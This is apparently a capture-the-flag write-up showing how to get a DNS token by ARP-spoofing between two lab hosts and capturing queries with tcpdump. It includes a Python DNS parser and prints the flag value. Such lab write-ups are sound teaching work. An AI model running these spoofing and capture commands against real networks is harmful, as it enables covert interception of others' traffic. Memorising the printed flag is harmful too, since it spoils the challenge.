
Token 3: DNS Domain Token

Token: PCCC-Domain-Name-Simian-02-95yA

Objective

Intercept the DNS request from dnsvictim.pccc and find the token in the first label of the domain name.

Hosts

  • dnsvictim.pccc: 10.0.91.134
  • dnsmasq.pccc: 10.0.91.133

Method: ARP Spoof + DNS Capture

Step 1: Enable IP forwarding

sysctl -w net.ipv4.ip_forward=1

Step 2: ARP spoof between victim and DNS server

The first command tells the victim that our MAC is the DNS server's; the second tells the DNS server that our MAC is the victim's. Both directions are needed so that the query and the response both transit our host. Replace eth1 with the interface on the 10.0.91.0/24 segment.

arpspoof -i eth1 -t 10.0.91.134 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.134 &

Step 3: Capture DNS traffic

tcpdump -i eth1 -n port 53 -A

Or, keeping only the decoded query lines that mention the target domain (-l line-buffers the output so the pipe to grep shows hits immediately):

tcpdump -i eth1 -n 'udp port 53' -l | grep -i pccc

Step 4: Observe the DNS query

tcpdump decodes the question section in its summary line (for example `A? PCCC-Domain-Name-Simian-02-95yA.target.pccc.`). The victim queries for:

PCCC-Domain-Name-Simian-02-95yA.target.pccc

The token is the first label (the leftmost subdomain) of this domain name, everything before the first dot.
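The same extraction done without relying on tcpdump's decoder, as an added example that is not part of the original write-up: a minimal parser for the DNS wire format that pulls the first label out of a query's QNAME. The packet bytes are constructed inline (the transaction ID and the www.example.com comparison query are made up for the test); the token regex is an assumption based on the PCCC-some-words-??-???? format described in the Note.

```python
import re
import struct

# Added example, not code from the original write-up. Everything here is
# constructed inline; no packets are captured. The token pattern is assumed
# from the Note's "PCCC-some-words-??-????" description.
TOKEN_RE = re.compile(r"^PCCC-[A-Za-z0-9-]+-[A-Za-z0-9]{2}-[A-Za-z0-9]{4}$")


def build_query(qname: str, txid: int = 0x1234) -> bytes:
    """Build a minimal DNS A query (QCLASS IN) for qname.

    Used only to construct sample input for the parser below; txid is an
    arbitrary constructed value.
    """
    # ID, flags (RD set), QDCOUNT=1, ANCOUNT, NSCOUNT, ARCOUNT
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    body = b""
    for label in qname.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"bad label length: {label!r}")
        body += bytes([len(raw)]) + raw      # length-prefixed label
    body += b"\x00"                          # root label terminates the name
    body += struct.pack("!HH", 1, 1)         # QTYPE A, QCLASS IN
    return header + body


def parse_question(payload: bytes):
    """Return (txid, qname, qtype, qclass) from the first question of a DNS
    message (the UDP payload, i.e. everything after the 8-byte UDP header).

    Queries carry uncompressed names, so no pointer following is needed; a
    compression pointer (top two bits of the length byte set) is rejected.
    """
    if len(payload) < 12:
        raise ValueError("truncated DNS header")
    txid, flags, qdcount = struct.unpack("!HHH", payload[:6])
    if flags & 0x8000:
        raise ValueError("message is a response, not a query")
    if qdcount < 1:
        raise ValueError("no question section")
    pos = 12
    labels = []
    while True:
        if pos >= len(payload):
            raise ValueError("truncated QNAME")
        length = payload[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in query name")
        labels.append(payload[pos:pos + length].decode("ascii"))
        pos += length
    if len(payload) < pos + 4:
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!HH", payload[pos:pos + 4])
    return txid, ".".join(labels), qtype, qclass


def token_from_query(payload: bytes):
    """Return the first label of the queried name if it matches the token
    format, else None."""
    _, qname, _, _ = parse_question(payload)
    first = qname.split(".")[0]
    return first if TOKEN_RE.match(first) else None


if __name__ == "__main__":
    sample = build_query("PCCC-Domain-Name-Simian-02-95yA.target.pccc")
    print(parse_question(sample))
    print(token_from_query(sample))
```

The parser reads the raw UDP payload, so it can be pointed at bytes from a pcap or a raw socket in place of tcpdump's text output; the response-flag check matters because the same port-53 capture also carries the resolver's answers, which use name compression.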

Why It Works

Standard DNS queries are sent as plaintext UDP, so the queried name is readable by anyone on the path. ARP has no authentication: hosts accept unsolicited ARP replies and overwrite their cache entries, so after the spoof both the victim and the DNS server send their traffic for each other to our MAC. Because IP forwarding is enabled, we relay the packets and the victim's resolution keeps working, which keeps the interception unnoticed while tcpdump observes every query and response in transit.

Note

This token uses the alternative format PCCC-some-words-??-???? (hyphens instead of underscores and braces) so that it is a valid hostname label: hostname labels are limited to letters, digits and hyphens, so the underscores and braces of the usual token format would not pass through a resolver.

Cleanup

pkill arpspoof

On termination arpspoof sends corrected ARP replies to both hosts, restoring their caches. Afterwards set net.ipv4.ip_forward back to 0 so the attacking host stops routing.